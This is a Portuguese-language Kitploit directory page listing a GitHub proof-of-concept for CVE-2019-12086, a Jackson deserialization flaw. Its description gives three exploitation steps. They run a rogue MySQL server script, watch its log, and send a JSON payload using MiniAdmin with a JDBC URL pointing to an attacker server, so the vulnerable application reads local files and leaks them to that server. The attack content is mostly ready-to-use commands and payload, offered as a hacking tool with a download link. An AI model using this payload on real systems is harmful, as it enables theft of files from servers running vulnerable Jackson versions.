Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-12086 — jackson unserialize | Kitploit
Ferramentas/GitHubGitHub/al1ex/cve-2019-12086
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança de Banco de Dados
GitHubal1ex/cve-2019-12086

CVE-2019-12086

jackson unserialize

Ver Repositório
13há 6 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Descrição do Documento

CVE-2019-12086 desserialização do Jackson

Exploração da Vulnerabilidade

1、Iniciar o servidor MySQL malicioso:

python rogue_mysql_server.py

2、Ver o mysql.log no mesmo diretório:

tail -f mysql.log

3、Enviar o seguinte json para a aplicação vulnerável:

["com.mysql.cj.jdbc.admin.MiniAdmin","jdbc:mysql://attacker_server:port/foo"]

Quando o Jackson desserializa a string json maliciosa, ele se conecta ao servidor MySQL malicioso, e o conteúdo do arquivo lido é escrito no mysql.log do servidor malicioso.

Baixar ferramenta